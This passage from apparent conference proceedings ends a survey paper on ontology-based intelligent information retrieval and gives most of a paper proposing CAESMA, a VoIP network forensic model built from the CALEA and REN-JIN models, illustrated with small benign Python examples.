The need for sophisticated ontology languages was already clear fifteen years ago, but at that time there was a fundamental mismatch between the expressive power and efficiency of reasoning that DL systems provided, and the expressivity and large knowledge bases that ontologists needed. Through the basic research in DLs of the last fifteen years, this gap between the needs of ontologists and the systems that DL researchers provide has finally become narrow enough to build stable bridges. In fact, the web ontology language OWL 2, which was accorded the status of a World Wide Web Consortium (W3C) recommendation in 2009 and is therefore the official Semantic Web ontology language, is based on an expressive DL (http://www.w3.org/TR/owl2-overview/).


There is growing interest in the use of ontologies and related semantic technologies in a wide variety of application domains. Arguably the most successful application area in this regard is the biomedical field (Hahn, Schulz 2007; Wolstencroft et al. 2005). Some of the biggest breakthroughs can be traced back to the pioneering work of Horrocks (Horrocks 1997), who developed algorithms specifically tailored for medical applications. Recent advances have made it possible to perform standard reasoning tasks on large-scale medical ontologies such as SNOMED CT (an ontology with more than 300 000 concepts and more than a million semantic relationships) in less than half an hour; a feat that would have provoked disbelief ten years ago (Suntisrivaraporn et al. 2007). However, a number of obstacles still remain before the use of ontologies can be regarded as an established technology: mainly, these are issues relating to conceptual modelling and data usage.

Figure 1: Productivity of keyword search

2.4.1 Conceptual modelling

There are currently no firmly established conceptual modelling methodologies for ontology engineering. Although a variety of tools exist for ontology construction and maintenance (Kalyanpur et al. 2006; Sirin et al. 2007; Protégé 2009), they remain accessible mainly to those with specialised knowledge of the theory of ontologies. One way of dealing with this problem is to design ontology languages that are as close to natural language as possible, while still retaining the unambiguous semantics of a formal language (Schwitter et al. 2007). A related approach is to use unstructured text to automatically identify concepts and relationships in application domains, and in doing so contribute to the semi-automated construction of ontologies (Buitelaar, Cimiano 2008).

Another major obstacle is that, while most tools for ontology construction and maintenance assume a static ontology, the reality is that ontologies are dynamic entities, continually changing over time for a variety of reasons. This has long been identified as a problem, and ontology dynamics is currently seen as an important research topic (Baader et al. 2005; Lee et al. 2006).

2.4.2 Data usage

Assuming that the problems relating to conceptual modelling have been solved, and that it is possible to construct and maintain high-quality ontologies, a number of stumbling blocks related to data usage still remain.

The main problem is that most available data are currently in the form of unstructured or semi-structured text, or are found in traditional relational database systems. The rich conceptual structures provided by ontologies are therefore of little use unless ways can be found to automate, or semi-automate, the process of populating ontologies with these data. Regarding data in textual form, there have been some recent attempts to perform semi-automated instantiation of ontologies from text (Buitelaar, Cimiano 2008; Williams, Hunter 2007). With regard to the data found in database systems, it is necessary to employ data coupling: finding ways of linking the data residing in database systems to the ontologies placed on top of such systems (Calvanese et al. 2006). This challenge is currently being met by tools for Ontology Based Data Access (OBDA) (Rodriguez-Muro et al. 2008).
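The idea of data coupling can be sketched as a mapping from relational rows to ontology assertions, loosely in the spirit of OBDA tools. The table, column names, and concept names below are entirely hypothetical, and real OBDA systems express such mappings declaratively rather than in code.

```python
# Data-coupling sketch: rows of a relational table are turned into
# ontology instance assertions via a column-to-concept mapping.

rows = [
    {"id": 1, "name": "Port Alpha", "kind": "harbour"},
    {"id": 2, "name": "Route 9",    "kind": "road"},
]

# Mapping: the "kind" column selects the ontology concept.
KIND_TO_CONCEPT = {"harbour": "Infrastructure", "road": "Infrastructure"}

def populate(rows):
    assertions = []
    for r in rows:
        concept = KIND_TO_CONCEPT.get(r["kind"], "Thing")
        assertions.append((f"facility_{r['id']}", "instanceOf", concept))
        assertions.append((f"facility_{r['id']}", "hasName", r["name"]))
    return assertions

for triple in populate(rows):
    print(triple)
```

Once the rows are exposed as assertions like these, the inference machinery of the ontology can be applied to the database content without copying or restructuring the database itself.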

Once an ontology is populated, it becomes possible, at least in principle, to use it as a sophisticated data repository to which complex queries can be posed. In practice, at least two challenges remain. The first is to perform query answering efficiently, a topic of ongoing research (Calvanese et al. 2007). The second is to go beyond purely deductive reasoning when answering queries, and to be more proactive. A good example of this type of reasoning occurs during medical diagnosis, which is an instance of a form of reasoning technically known as abduction (Elsenbroich et al. 2007).

2.5 Tools for user support

There is a danger that the complexity of the techniques discussed above will pose a barrier to their general uptake. Most techniques presuppose some familiarity with technical matters such as formal logic languages, which can be disconcerting for the more casual user. We discuss two classes of methods used to bridge the gap between users and the technology.

2.5.1 Controlled natural language

A controlled natural language is a suitable fragment of a natural language, usually obtained by restricting the grammar and vocabulary. This is done primarily to ensure that there is no ambiguity in the interpretation; it can also reduce complexity. Controlled natural languages can usually be mapped to existing formal languages, typically a fragment of first-order logic.

For our purposes the translation will be to a suitable DL used to represent ontologies. Because of this mapping, controlled natural languages have a formal semantics, making them suitable as knowledge representation languages, able to support inference tasks such as query answering. The advantage of using controlled natural languages instead of their logic counterparts is that it appears to the user as if a natural language is being used. Work on controlled natural languages most relevant to logic-based ontologies includes the Manchester OWL Syntax (Horrocks et al. 2006), the Sydney OWL Syntax (SOS) (Schwitter et al. 2007), and the Rabbit language (Hart et al. 2008).
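A minimal sketch of the controlled-natural-language idea: a single sentence pattern is translated into a subclass axiom, and anything outside the pattern is rejected. Actual CNLs such as SOS or Rabbit support far richer grammar; the pattern and the axiom syntax here (which mimics OWL functional syntax) are illustrative only.

```python
import re

# One controlled sentence pattern: "Every X is a/an Y."
PATTERN = re.compile(r"^Every (\w+) is an? (\w+)\.$")

def translate(sentence):
    """Translate a controlled sentence into a subclass axiom,
    raising ValueError for sentences outside the fragment."""
    m = PATTERN.match(sentence)
    if not m:
        raise ValueError("sentence is outside the controlled fragment")
    sub, sup = m.group(1).capitalize(), m.group(2).capitalize()
    return f"SubClassOf({sub}, {sup})"

print(translate("Every harbour is an installation."))
# prints SubClassOf(Harbour, Installation)
```

Because every accepted sentence maps to exactly one axiom, the user writes something that reads like English while the system obtains an unambiguous logical statement.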

2.5.2 Contextual navigation

This subsection is concerned with the principles of the design and development of an intelligent query interface (Catarci et al. 2004). The interface is intended to support users in formulating queries which best capture their specific information needs. The distinctive part of this approach is the use of an ontology as the support for the intelligence contained in the query interface. The user can exploit the vocabulary in the ontology to formulate the query. Using the information contained in the ontology, the system is able to guide the user to express their intended query more precisely. Queries can be specified through an iterative refinement process supported by the ontology through contextual navigation. In addition, users may discover new information about the domain without explicit querying, but through the subparts of a query, using classification. Work on contextual navigation is not restricted to logic-based ontology languages, but it does depend on an underlying knowledge representation language with an associated formal reasoner. In the context of ontologies, it has led to the development of a query tool as part of the European Union funded SEWASIE project (SEmantic Webs and AgentS in Integrated Economies) (http://www.sewasie.org/).
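The iterative refinement loop described above can be caricatured as follows: at each step the interface consults the ontology's narrower-concept relation to offer the user refinement choices. The ontology fragment and concept names are invented for the example.

```python
# Contextual-navigation sketch: the interface suggests narrower
# concepts from the ontology as refinements of the current query.

NARROWER = {
    "Infrastructure": ["Harbour", "Airfield", "PowerStation"],
    "Harbour": ["ContainerTerminal"],
}

def suggest_refinements(concept):
    """Refinement choices the query interface would offer next."""
    return NARROWER.get(concept, [])

# The user starts broad and the interface guides stepwise narrowing:
print(suggest_refinements("Infrastructure"))
print(suggest_refinements("Harbour"))
```

In a full system the narrower-concept relation would be computed by the reasoner (classification) rather than stored in a hand-written table, which is how users can discover relationships they never asserted explicitly.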

3. Research methodology

We first conducted a needs analysis with our client, with the aim of identifying their expectations and requirements, followed by a problem analysis in which the client’s domain was studied and recommendations were made on the most appropriate technologies for their applications.

3.1 Needs analysis

Needs analysis is an interactive process with the aim of extracting information from the client in order to understand their needs and expectations. It involves asking the client specific questions and recording and documenting their responses. Usually several interactions are required before this process is complete.

The types of questions posed to our client can broadly be described as:

- What is the reality of your domain?
- What do you do?
- What are the challenges you experience?
- What are your expectations of an information operation?

The aim of these questions is to identify the type of IO the client wants to execute, the range of required information sources, and how information should be interpreted. It should also point to the type of information repositories that will be needed, and how they should be populated and updated. As a result we compiled an extensive set of derived questions. These questions depict the scope of information required by our client for an operation.

3.2 Problem analysis

In this phase we analysed the various methodologies and technologies available for an appropriate knowledge representation system for the client’s domain. A basic assumption is that all information can be accessed electronically, and includes documents, images or maps, and data stored in database systems or in more sophisticated structures.

The following three primary questions were applied to the client’s domain:

- In which way will a user extract information, i.e. which query language is to be used?
- How will the type of information to be extracted be matched with the query?
- Which method will be used to retrieve the information specified in the query from the information repository?

A formal problem statement was written that includes strategic long-term direction and objectives.

3.3 Findings

The main recommendation is that a logic-based ontology be used as the underlying technology for the retrieval system. The adoption of logic-based ontologies as the underlying formalism for a knowledge representation system has a number of advantages:

- the semantics of such an ontology is unambiguous;
- it facilitates intelligent search;
- it provides an optimal trade-off between expressivity and complexity; and
- it can yield optimal recall of information.

The main risk in adopting this technology lies in its emerging status. Its impressive progress in the biomedical domain lends strong support for its adoption in the IO domain, but there are presently no off-the-shelf ontologies available for IO.

The development of such an ontology that is both reliable and complete is a highly complex research endeavour. With this in mind, we recommend an incremental approach to the adoption of this technology in order to realise the long-term strategic objectives outlined earlier.

The developmental recommendations for a prototype system are:

- Define a suitable sub-domain for initial development. Our client’s domain is vast and complex; the recommendation is to start with a smaller, focused domain.
- The documents in the domain should be tagged. The choice of tags will depend on the ontology and the concepts used in existing information sources.
- An ontology-based search facility should be developed.
- An appropriate query language should be decided on, in conjunction with a suitable user interface, which may involve controlled natural language or contextual navigation, or both.

The evaluation of a prototype system will determine the extension of the system into a comprehensive knowledge system.

4. Conclusion

In this paper we have focused on the technologies relevant for intelligent information retrieval for Information Operations. Conceptually, the survey is decomposed into three parts:

- choices for a suitable query language;
- the type of information to be extracted;
- the methods employed for information retrieval.

Supplementary to this is a discussion of ontologies, as well as of tools for supporting users of systems for intelligent retrieval.

Our main conclusion is that the use of logic-based ontologies has the potential to be of enormous benefit in systems demanding truly intelligent retrieval. However, it has to be taken into account that this is an emerging technology that still requires a substantial amount of research in order to reach maturity. The good news is that it is possible to approach matters in an incremental fashion, developing an information repository based on more traditional methods and gradually increasing its sophistication.

References

The Protégé Ontology Editor. Available: http://protege.stanford.edu/. [2009, January].
Baader, F., Calvanese, D., McGuinness, D., Nardi, D. & Patel-Schneider, P. (2003) The Description Logic Handbook: Theory, Implementation, and Applications, Cambridge University Press.
Baader, F., Lutz, C., Milicic, M., Sattler, U. & Wolter, F. (2005) "Integrating Description Logics and Action Formalisms: First Results", AAAI 05.
Ben-Ari, M. (2008) Mathematical Logic for Computer Science, Springer.
Berners-Lee, T., Hendler, J. & Lassila, O. (2001) "The Semantic Web", Scientific American, Vol. 284, No. 5.
Brown, L. (1993) The New Shorter Oxford English Dictionary on Historical Principles, Vol. 1, Oxford University Press.
Buitelaar, P. & Cimiano, P. (2008) "Ontology Learning and Population: Bridging the Gap Between Text and Knowledge", Frontiers in Artificial Intelligence and Applications, Vol. 167.
Buitelaar, P. & Magnini, B. (2005) "Ontology Learning From Text: Methods, Evaluation and Applications", Frontiers in Artificial Intelligence and Applications, Vol. 123.
Calvanese, D., De Giacomo, G., Lembo, D., Lenzerini, M., Poggi, A. & Rosati, R. (2006) "Linking Data to Ontologies: The Description Logic DL-LiteA", The 2nd Workshop on OWL.
Calvanese, D., De Giacomo, G., Lembo, D., Lenzerini, M. & Rosati, R. (2007) "Tractable Reasoning and Efficient Query Answering in Description Logics: The DL-Lite Family", Journal of Automated Reasoning, Vol. 39, No. 3.
Catarci, T., Dongilli, P., Di Mascio, T., Franconi, E., Santucci, G. & Tessaris, S. (2004) "An Ontology Based Visual Tool for Query Formulation Support", ECAI 2004.
Ceri, S., Gottlob, G. & Tanca, L. (1989) "What You Always Wanted to Know About Datalog (and Never Dared to Ask)", IEEE Transactions on Knowledge and Data Engineering, Vol. 1, No. 1.
Elsenbroich, C., Kutz, O. & Sattler, U. (2007) "A Case for Abductive Reasoning over Ontologies", OWLED.
Fellbaum, C. (1998) WordNet: An Electronic Lexical Database, MIT Press.
Gray, J. & Reuter, A. (1992) Transaction Processing: Concepts and Techniques, Morgan Kaufmann Publishers.
Gruber, T. (1993) "A Translation Approach to Portable Ontology Specifications", Knowledge Acquisition, Vol. 5.
Hahn, U. & Schulz, S. (2007) "Ontological Foundations for Biomedical Sciences", Artificial Intelligence in Medicine, Vol. 39, No. 3.
Hart, G., Dolbear, C. & Johnson, M. (2008) "Rabbit: Developing a Controlled Natural Language for Authoring Ontologies", 5th European Semantic Web Conference.
Horrocks, I. (1997) Optimising Tableaux Decision Procedures for Description Logics, University of Manchester.
Horrocks, M., Drummond, N., Goodwin, J., Rector, A., Stevens, R. & Wang, H. (2006) "The Manchester OWL Syntax", OWL Experiences and Directions Workshop.
Kalyanpur, A., Parsia, B., Sirin, E., Cuenca-Grau, B. & Hendler, J. (2006) "Swoop: A Web Ontology Editing Browser", Journal of Web Semantics, Vol. 4, No. 2.
Kroenke, D.M. (1997) Database Processing: Fundamentals, Design, and Implementation, Prentice-Hall.
Lee, K., Meyer, T., Pan, J.Z. & Booth, R. (2006) "Finding Maximally Satisfiable Terminologies for the Description Logic ALC", Proceedings of AAAI 06.
Lloyd, J.W. (1987) Foundations of Logic Programming, Springer-Verlag, New York.
McCrohan, K.F. (1998) "Competitive Intelligence: Preparing for the Information War", Long Range Planning, Vol. 31, No. 4.
Rodriguez-Muro, M., Lubyte, L. & Calvanese, D. (2008) "Realizing Ontology Based Data Access: A Plug-in for Protégé", ICDE Workshops.
Schwitter, R., Cregan, A. & Meyer, T. (2007) "Sydney OWL Syntax - Towards a Controlled Natural Language Syntax for OWL 1.1", OWL Experiences and Directions, Third International Workshop.
Sirin, E., Parsia, B., Grau, B.C., Kalyanpur, A. & Katz, Y. (2007) "Pellet: A Practical OWL-DL Reasoner", Journal of Web Semantics, Vol. 5, No. 2.
Spivack, N. (2007). Available: http://novaspivack.typepad.com/nova_spivacks_weblog/2007/03/beyond_keyword_.html. [2010, November].
Staab, S. & Studer, R. (eds) (2004) Handbook on Ontologies, Springer.
Suntisrivaraporn, B., Baader, F., Schulz, S. & Spackman, K. (2007) "Replacing SEP-Triplets in SNOMED CT Using Tractable Description Logic Operators", AIME.
Williams, M. & Hunter, A. (2007) "Harnessing Ontologies for Argument-Based Decision-Making in Breast Cancer", International Conference for Tools with Artificial Intelligence.
Wolstencroft, K., Brass, A., Horrocks, I., Lord, P., Sattler, U., Stevens, R. & Turi, D. (2005) "A Little Semantic Web Goes a Long Way in Biology", International Semantic Web Conference.


CAESMA – An On-Going Proposal of a Network Forensic Model for VoIP Traffic

Jose Mas y Rubi, Christian Del Carpio, Javier Espinoza, and Oscar Nuñez Mori
Pontificia Universidad Catolica del Peru, Lima, Peru
jlmasyrubi@pucp.edu.pe
delcarpio.christian@pucp.edu.pe
jmespino@pucp.edu.pe
oscar.nunez@pucp.pe

Abstract: In the near future, service convergence will be a reality, which raises the possibility that these technologies will be misused. One of these services is Voice over IP (VoIP), which provides telephone communication in this scheme. VoIP is currently a very popular technology, and it could be used by malicious attackers to commit computer crimes whose perpetrators are difficult to trace because of the nature of IP networks. Our approach is therefore to carry out a preliminary analysis in order to create a forensic model for the detection and tracing of VoIP traffic, which will allow adequate collection of evidence that could be used by the police authorities.

Keywords: network forensics, forensic model proposal, voice over IP

1. Introduction

Due to the inadequate use of the telephone service in converged networks, mainly by malicious attackers who misuse this technology, it becomes necessary to identify the security gaps in such networks and to provide a possible solution.

Therefore, prior to the development of this article we analyzed the security gaps (Annex 1), and based on that analysis we identified "user identification for calls originated from the Internet (VoIP)" as a potential security problem, owing to the lack of user data validation at the registration process when calls come from that source.

This problem hinders proper evidence collection by the authorities, so these acts often go unpunished because the attackers cannot be identified.

This paper proposes a preliminary data collection model for subsequent forensic analysis in a VoIP network environment, for calls generated from the Internet, based on the network architecture shown in Figure 1. For our analysis, we rely on the Digital Forensics Research Workshop (DFRWS) model, which is a general model for proper digital forensic analysis.

Figure 1: Network architecture



Jose Mas y Rubi et al.<br />

As can be seen in the network architecture, the originating point of the calls in our analysis is the Internet cloud. The call establishment and signaling path is the following:

a. Connection to the SIP server, which contains the database of all the users in the VoIP network.

b. After validation of the destination user, who is part of the VoIP network, the SIP server sends the corresponding signaling to establish the call with the VoIP network.

The rest of the article is organized as follows. In section II we introduce the background to our work, which offers a clear basis for the DFRWS general analysis model and the technology behind the VoIP service. In section III we describe the CALEA and REN-JIN models, offering a theoretical basis and techniques that allow a better understanding of this work's proposal. In section IV we develop a comparative analysis of the CALEA and REN-JIN models, taking the DFRWS general model as the study base for both. In section V we propose a new forensic model resulting from the previous analysis, and we study its preliminary architecture and basic operation. Finally, we present our conclusions and possible future work.

2. Theoretical basis

To start our investigation, it is necessary to study the DFRWS general model for forensic analysis and the technical concepts of VoIP technology, in order to contextualize our analysis in a suitable environment.

2.1 Digital Forensics Research Workshop (DFRWS) model

Several forensic investigators have analyzed multiple digital forensic models. Among those models, they found that the DFRWS model is rigid and linear but particularly suitable where the necessary investigative activities are well understood (Ray 2007). They also highlight the fact that, for the first time in the development of such a model, academic entities were involved, which had not happened with other forensic models of its time; all other models were focused more on guidelines established by law enforcement (Reith 2002).

Therefore, we chose the DFRWS model because it allows a comprehensive approach and is better aligned with the objectives of this academic article. The step sequence followed by this model for an adequate forensic analysis is shown below:

Table 1: Steps for a digital forensic analysis (DFRWS 2001)

2.2 Voice over IP (VoIP)

The important point to keep in mind about VoIP technology concerns the information shared between the terminal devices and the data itself, which enables us to discriminate the calls and their types. These elements are presented in the following lists (Pelaez 2010):

a) Terminal device information:



Numbers called.
Source and destination IP addresses.
IP geographical localization.
Incoming calls.
Start/end times and duration.
Voice mail access numbers.
Call forwarding numbers.
Incoming/outgoing messages.
Access codes for voice mail systems.
Contact lists.

b) VoIP data:

Protocol type.
Configuration data.
Raw packets.
Inter-arrival times.
Variance of inter-arrival times.
Payload size.
Port numbers.
Codecs.
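These fields lend themselves to a simple structured call record. The sketch below is only illustrative: the class and field names are ours, not part of the models discussed in this paper.

```python
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class VoipCallRecord:
    """Illustrative container for the evidence elements listed above."""
    # a) Terminal device information
    number_called: str
    src_ip: str
    dst_ip: str
    start_time: float                 # epoch seconds
    end_time: float
    forwarding_numbers: List[str] = field(default_factory=list)
    # b) VoIP data
    protocol: str = "SIP/RTP"
    payload_sizes: List[int] = field(default_factory=list)
    inter_arrival_times: List[float] = field(default_factory=list)
    codec: Optional[str] = None

    @property
    def duration(self) -> float:
        """Derived rather than stored: end time minus start time."""
        return self.end_time - self.start_time

rec = VoipCallRecord("4981791", "203.0.113.5", "198.51.100.7",
                     start_time=1000.0, end_time=1065.5, codec="G.711")
print(rec.duration)  # 65.5
```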

The Session Initiation Protocol (SIP) is an important part of VoIP network communication. SIP is an IETF standard for IP multimedia conferences. It is an application layer control protocol used to create, modify and terminate sessions with one or more participants. These sessions include Internet multimedia conferences, Internet phone calls and multimedia distribution. The signaling allows call information to be carried across network boundaries, and session management provides the ability to control the attributes of an end-to-end call (Fernandez 2007).
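To make the signaling concrete, the following sketch extracts a few standard SIP header fields (From, To, Call-ID) from a simplified, hypothetical INVITE request; a production parser would follow the full SIP specification (RFC 3261).

```python
SAMPLE_INVITE = """INVITE sip:4981791@example.net SIP/2.0
Via: SIP/2.0/UDP host.example.com;branch=z9hG4bK776
From: <sip:caller@example.com>;tag=49583
To: <sip:4981791@example.net>
Call-ID: a84b4c76e66710
CSeq: 314159 INVITE
"""

def parse_sip_headers(raw: str) -> dict:
    """Split a SIP request into its request line and header fields."""
    lines = raw.strip().splitlines()
    headers = {"request": lines[0]}
    for line in lines[1:]:
        # Split only on the first colon, so header values may contain ':'.
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers

h = parse_sip_headers(SAMPLE_INVITE)
print(h["Call-ID"])  # a84b4c76e66710
```

Fields such as Call-ID and From/To are exactly the kind of signaling evidence a forensic recorder would retain.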

3. Related works

In our preliminary investigation, we searched for models that could fit the DFRWS general model, and among the most outstanding we found REN-JIN and CALEA, which are described in the following subsections.

3.1 CALEA model

Government surveillance is a special case of network forensics. The Communications Assistance for Law Enforcement Act (CALEA) is another term used for this electronic surveillance. It means that it is legally valid to introduce an agent inside a communication channel to intercept information without altering it (Scoggins 2004).

The wiretap installation is based on the cable modem's MAC address, so it can be used for data or digital voice connections. This characteristic is controlled by the command interface, intercepted cable, which requires a MAC address, an IP address and a UDP port number as its parameters (Scoggins 2004).

When interception is active, the router examines each packet for the desired MAC addresses, and when it finds a match to one of those addresses (either from the origin or the destination terminal device), a copy is sent to the server specified by the IP address and port number (Scoggins 2004).
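The MAC-matching behavior described by Scoggins can be sketched as follows. The packet model and the (ip, port) "server" tuple are simplifications we introduce for illustration; a real intercept would copy packets inside the router rather than in application code.

```python
from typing import NamedTuple

class Packet(NamedTuple):
    src_mac: str
    dst_mac: str
    payload: bytes

def mirror_matching(packets, target_macs, server):
    """Copy every packet whose source or destination MAC address is under
    surveillance; each copy is tagged with the collection server (ip, port)."""
    mirrored = []
    for pkt in packets:
        if pkt.src_mac in target_macs or pkt.dst_mac in target_macs:
            mirrored.append((server, pkt))  # stand-in for an actual UDP send
    return mirrored

traffic = [
    Packet("aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", b"voice frame"),
    Packet("cc:cc:cc:cc:cc:cc", "dd:dd:dd:dd:dd:dd", b"unrelated"),
]
out = mirror_matching(traffic, {"bb:bb:bb:bb:bb:bb"}, ("10.0.0.9", 5000))
print(len(out))  # 1
```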

Figure 2 shows how the components of the CALEA model (Delivery Function, Collection Function and Law Enforcement Agency) integrate with a VoIP system to provide transparent lawful interception. Calls are routed through an access gateway that hides any intercepts in place (Pelaez 2007).

Figure 2: CALEA forensic model (Pelaez 2007)

Telephone interception can be classified into two categories:

Call detail: the call details sent and received by a subscriber, which are passed to the LEA. The call records generated from signaling messages can be very valuable in criminal investigations. Signaling messages contain data about phone calls, not the content of the conversation; therefore, the collection and analysis of signaling messages may not be subject to the same legal restrictions as recording voice conversations (Moore 2005).

Call content: the actual content of the call, which is passed to the LEA. The suspect must not detect the mirror, so this element must be produced inside the network and not on the subscriber link. The mirror must also not be detectable through any change in timing, availability characteristics or operation (Pelaez 2007).

In order for the LEA to take advantage of the call content without the subscriber noticing any change, all calls must pass through a device that duplicates the content and then passes it to the agency (Pelaez 2007).

3.2 REN–JIN model

This model, conceived by Wei Ren and Hai Jin, is designed to capture network traffic and to record the corresponding data. This network forensic system has four elements (Pelaez 2006):

Network Forensics Server, which integrates and analyzes the forensic data. It also guides the network packet filtering and capture behavior of the Network Monitor, and it can request the activation of an investigation program in the Network Investigator as a response to a sensitive attack.

Network Forensics Agents, responsible for data collection, data extraction and secure data transportation. These agents are distributed around the network and the monitored hosts.

Network Monitor, a packet and network traffic capture machine.

Network Investigator, the network surveillance machine. It investigates a target when the server gives the command, and it activates a real-time response program for each network intrusion.

Network forensic systems and Honeynet systems share the same data collection function for system misuse. A Honeynet system lures attackers and gains information about new types of intrusions, while a network forensic system analyzes and reconstructs the attack behavior. The integration of both systems helps to create an active self-learning and response system that captures the intrusion behavior and investigates the original source of the attack (Pelaez 2006).

Figure 3: REN-JIN forensic model (Pelaez 2006)

Honeynets are a highly controlled type of network architecture, one in which all activity that occurs can be monitored. By placing real victims (which can be any type of system, service or information) inside the network as attack targets, an environment is created where everything that happens can be observed, allowing attacking intruders to interact with the Honeynet while information about the attack is collected. Honeynets are high-interaction real networks that implement traps to detect, divert or, in some cases, counteract unauthorized uses of the information system, and they generate no legitimate service or traffic of their own. Therefore, any interaction with the Honeynet implies malicious or unauthorized activity; any connection initiated to a Honeynet implies that someone has compromised a system and initiated a suspicious activity. This makes activity analysis much easier, because all captured information can be assumed to be unauthorized or malicious (Honeynet 2006).
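Because a Honeynet offers no legitimate services and generates no traffic of its own, classifying activity reduces to a membership test on the decoy address range. A minimal sketch (the address block below is a hypothetical documentation range, not taken from the paper):

```python
import ipaddress

# Hypothetical decoy address range assigned to the Honeynet.
HONEYNET = ipaddress.ip_network("192.0.2.0/24")

def is_suspicious(dst_ip: str) -> bool:
    """Any connection addressed to the Honeynet is assumed malicious."""
    return ipaddress.ip_address(dst_ip) in HONEYNET

print(is_suspicious("192.0.2.17"))    # True
print(is_suspicious("198.51.100.3"))  # False
```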

4. Comparative analysis

One of the objectives of our work is to discuss the structure of the REN-JIN and CALEA models so that, at the end, we can state whether one of these models is applicable to forensic analysis of VoIP traffic, and also propose possible improvements to the model selected in this analysis process.

The methodology followed is to analyze the mentioned models within the DFRWS general model structure, to identify whether the functions of each individual model's elements meet the requirements of the chosen general model.

In other words, the elements that make up the CALEA and REN-JIN forensic models are located in the corresponding step of the DFRWS model structure, to identify whether the functions those elements provide cover each of the general model's important steps.

4.1 Discussion and analysis

Table 2 shows the main functions of each of the analyzed models, compared with those of the general model:

4.2 REN-JIN and CALEA operation differences

The main functions of CALEA are focused on a single component, the LEA, which depends on the traffic mirror used by the forensic agents to collect the required information. This makes the model easily adaptable to the rules governing lawful interception in the countries where these types of tools are used. However, it is the duty of each country to lay down rules for the use of this type of system, so that the collected evidence has full legality in the judicial environment.


Table 2: Comparative analysis between REN-JIN and CALEA models

In contrast, the main functions of REN-JIN are distributed among different components of the model, mainly controlled by the Network Forensics Server, which has the autonomy to determine what type of traffic should be captured and analyzed. This allows the tool to collect evidence in sequential steps, obtaining more precise and adequate information with respect to the requirements of the judicial entities.

Due to the characteristics of the CALEA model, forensic investigators need freedom of action over the analyzed networks. However, because those networks can be public, there is a potential risk that interceptions could involve innocent users, violating their privacy rights.

REN-JIN, like the CALEA model, requires that forensic investigators have freedom of action over the analyzed network. However, the traffic to be analyzed is channeled to the Honeynet used by the model, preserving the privacy rights of all users not involved in the study.

CALEA's operation can be considered reactive, since forensic investigators must first identify the suspect and only then deploy the analysis and capture platform proposed by the model.

REN-JIN's operation is also reactive, but instead of previously identifying the suspect, the investigator must identify the attacked network, which becomes the decoy network (Honeynet), based on the analysis and capture platform proposed by the model.

4.3 Model election

Based on our analysis, and after weighing the advantages and limitations of the two studied models, we observed that the REN-JIN model has the more adequate architecture, possessing the majority of the functions of the DFRWS general model; once its limitations are overcome, this model can be validated as a network forensic model. Also, while REN-JIN is a theoretical model, we believe it could be properly implemented.

4.4 Improvements in the chosen model

Considering REN-JIN as the chosen model, we observed that it presents several flaws, so we propose to correct them by inserting new elements that strengthen the architecture for a good VoIP forensic analysis.

The identification function could be implemented in a converged network through technologies such as the MEGACO/H.248 protocol (ITU 2005) and ENUM (IETF 2004).


The preservation function could be complemented with the deployment of a backup system, such as incremental backups and mirrored backups.

The presentation function would be implemented with a reporting mechanism containing the basic parameters needed to perform an adequate legal analysis, to use the results as proof, and possibly to validate them as evidence. By modifying the REN-JIN model and introducing these new elements, a new forensic model is obtained, which we call the CAESMA model.

5. Proposal of the CAESMA model

This proposal is an on-going investigation, so in the following subsections we present a preliminary architecture and its basic operation.

5.1 Presentation of the new architecture

To clarify the information flow between the elements that form this network architecture, we present the following basic diagram:

Figure 4: Proposed network architecture

By inserting an IP Multimedia Subsystem (IMS) module, we can integrate various existing communication service platforms. Likewise, an ENUM module allows us to link an identification number to a system user, bearing in mind that each user may have various means of communication previously integrated into IMS. To make this user identification proposal viable, an appropriate ENUM registration must exist for each of the services offered by the service provider. For example:

Figure 5: ENUM operation
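ENUM (IETF 2004) resolves a telephone number to its service URIs by mapping the digits to a DNS domain: the digits are reversed, separated by dots, and suffixed with e164.arpa. A sketch using the example number from section 5.2 (the country-code prefix "+1-" is our assumption for illustration; a real deployment would use the number's actual country code):

```python
def enum_domain(number: str) -> str:
    """Map an E.164 number to its ENUM DNS domain per RFC 3761:
    keep only digits, reverse them, dot-separate, append e164.arpa."""
    digits = [c for c in number if c.isdigit()]
    return ".".join(reversed(digits)) + ".e164.arpa"

print(enum_domain("+1-4981791"))  # 1.9.7.1.8.9.4.1.e164.arpa
```

A NAPTR lookup on the resulting domain would then return the user's registered service URIs (SIP, mail, etc.), which is what lets CAESMA tie a dialed number back to one identified user.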


Another pending point of improvement is the preservation function, which can be enhanced through data duplication techniques such as RAID disk structures or redundant servers; this modification must be implemented specifically in the Network Forensics Server, which can send backup data to such a medium once the data has been analyzed.

The purpose of the presentation function is to generate reports to be presented to the competent authorities; this requires specialized personnel who can adequately identify the proofs and validate them as possible evidence. For this purpose, we consider that an element that can fulfill this function is the Law Enforcement Agency (LEA), a fundamental part of the CALEA model. Some of the basic parameters to be considered would be the ones presented in section II under the VoIP topic.

5.2 Proposed network basic operation

The operation of the network architecture and the states relevant to our analysis are the following:

1) A call is generated from the Internet; the caller wants to communicate with some user on the network, using a number, for example, 4981791.

2) Once the Gateway receives the Internet user's communication request, it interacts with the IMS core, which in turn interacts with ENUM and returns the user identification of the called number, according to SIP signaling.

3) The CAESMA network intercepts the IMS core response and identifies the user affected by the criminal act being communicated.

4) CAESMA connects the capture network and starts the real-time forensic process.

5) The called user proceeds with the communication normally.

6) When the communication ends, the forensic process of collecting proofs also finishes.

Figure 6: Relevant states in CAESMA network operation
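The numbered states above can be summarized as a simple linear state machine; the state names below are ours, introduced only to illustrate the flow:

```python
from enum import Enum, auto

class CaesmaState(Enum):
    IDLE = auto()
    RESOLVING = auto()    # 1-2) Gateway -> IMS core -> ENUM lookup
    INTERCEPTED = auto()  # 3) CAESMA has identified the affected user
    CAPTURING = auto()    # 4-5) real-time forensic capture during the call
    DONE = auto()         # 6) call ends, evidence collection finishes

TRANSITIONS = {
    CaesmaState.IDLE: CaesmaState.RESOLVING,
    CaesmaState.RESOLVING: CaesmaState.INTERCEPTED,
    CaesmaState.INTERCEPTED: CaesmaState.CAPTURING,
    CaesmaState.CAPTURING: CaesmaState.DONE,
}

def run_call():
    """Walk the state machine from IDLE to DONE, recording each step."""
    state, trace = CaesmaState.IDLE, []
    while state in TRANSITIONS:
        state = TRANSITIONS[state]
        trace.append(state.name)
    return trace

print(run_call())  # ['RESOLVING', 'INTERCEPTED', 'CAPTURING', 'DONE']
```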

6. Conclusions

